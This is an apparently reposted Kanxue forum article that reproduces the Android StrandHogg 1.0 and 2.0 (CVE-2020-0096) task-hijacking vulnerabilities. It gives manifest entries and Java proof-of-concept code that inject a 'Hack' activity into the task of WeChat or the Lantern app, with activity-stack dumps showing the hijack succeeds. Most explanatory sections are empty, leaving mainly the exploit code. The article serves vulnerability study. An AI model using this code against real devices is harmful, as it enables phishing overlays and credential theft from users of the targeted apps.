其他
Android strandhogg漏洞复现学习
本文为看雪论坛优秀文章
看雪论坛作者ID:mb44
一
strandhogg1.0
该漏洞为一个 Android 任务栈劫持漏洞,在2019年披露,影响范围包括android10以下。该漏洞可以让恶意应用注入一个activity到他设定好的应用的顶层。因此恶意应用可以精心设计一个具有诱导性的activity注入到受害应用中进行攻击。
1、前置知识
<activity android:name=".inject_activity"
android:allowTaskReparenting="true"
android:taskAffinity="com.xx.mm"/>
<activity
2、漏洞原理
3、漏洞设计
<activity android:name=".Innocent"></activity>
<activity
android:name=".Hack"
android:allowTaskReparenting="true"
android:taskAffinity="com.tencent.mm" />
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
//启动两个活动
Intent hack_intent;
Log.d("MainActivity的TaskId" , getTaskId() + "");
hack_intent=new Intent(this, Hack.class);
//FLAG_ACTIVITY_NEW_TASK:相当于使用了launchMode=singleTop
hack_intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(hack_intent);
Intent innocent_intent;
innocent_intent=new Intent(this,Innocent.class);
startActivity(innocent_intent);
//finish();
}
}
Display #0 (activities from top to bottom):
Stack #171: type=standard mode=fullscreen
Task id #191
···
Running activities (most recent first):
//该应用的任务栈191中并没有Hackactivity的活动,而在另外一个新栈192中
TaskRecord{8780ff6 #191 A=com.test.strandhogg U=0 StackId=171 sz=2}
Run #1: ActivityRecord{e19cde9 u0 com.test.strandhogg/.Innocent t191}
Run #0: ActivityRecord{f021ac5 u0 com.test.strandhogg/.MainActivity t191}
mResumedActivity: ActivityRecord{e19cde9 u0 com.test.strandhogg/.Innocent t191}
Stack #172: type=standard mode=fullscreen
Task id #192
···
* TaskRecord{c609e64 #192 A=com.tencent.mm U=0 StackId=172 sz=1}
//该任务没有被执行或者放到前台,所以没有ActivityRecord
Stack #177: type=standard mode=fullscreen
Task id #197
Running activities (most recent first):
TaskRecord{4a0127f #197 A=com.tencent.mm U=0 StackId=177 sz=1}
Run #0: ActivityRecord{4076818 u0 com.test.strandhogg/.Hack t197}
4、漏洞的修补
二
strandhogg2.0(CVE-2020-0096)
1、漏洞原理
2、漏洞设计
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Intent[] Intents = new Intent[2];
Intents[0] = new Intent(); Intents[0].setClassName("org.getlantern.lantern","org.getlantern.lantern.MainActivity");
Intents[0].addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
Intents[1] = new Intent(this,Hack1.class);
//如果需要劫持多个应用,只需要扩大Intent的数组,重复intent1和intent2的操作
startActivities(Intents);
}
}
Running activities (most recent first):
TaskRecord{85bf004 #444 A=org.getlantern.lantern U=0 StackId=420 sz=2}
Run #1: ActivityRecord{b7ba43 u0 com.test.strandhogg2/.Hack1 t444}
Run #0: ActivityRecord{b564328 u0 org.getlantern.lantern/.MainActivity t444}
Running activities (most recent first):
TaskRecord{66e7766 #445 A=com.test.strandhogg2 U=0 StackId=421 sz=1}
Run #0: ActivityRecord{637578 u0 com.test.strandhogg2/.MainActivity t445}
3、漏洞的修补
三
参考
https://wrlus.com/security/mobile/android-strandhogg-2/; https://promon.co/resources/downloads/strandhogg-2-0-new-serious-android-vulnerability/#what-can-a-potential-attacker-do; https://promon.co/security-news/the-strandhogg-vulnerability/#has-strandhogg-been-abused-in-real-world-cases; https://www.cnblogs.com/aldys4/p/14879604.html; https://developer.android.com/guide/topics/manifest/activity-element?hl=zh-cn
看雪ID:mb44
https://bbs.pediy.com/user-home-942091.htm
# 往期推荐
2.FartExt超进化之奇奇怪怪的新ROM工具MikRom
4.栈与栈帧的调试
5.python_mmdt:ssdeep、tlsh、vhash、mmdthash对比
球分享
球点赞
球在看
点击“阅读原文”,了解更多!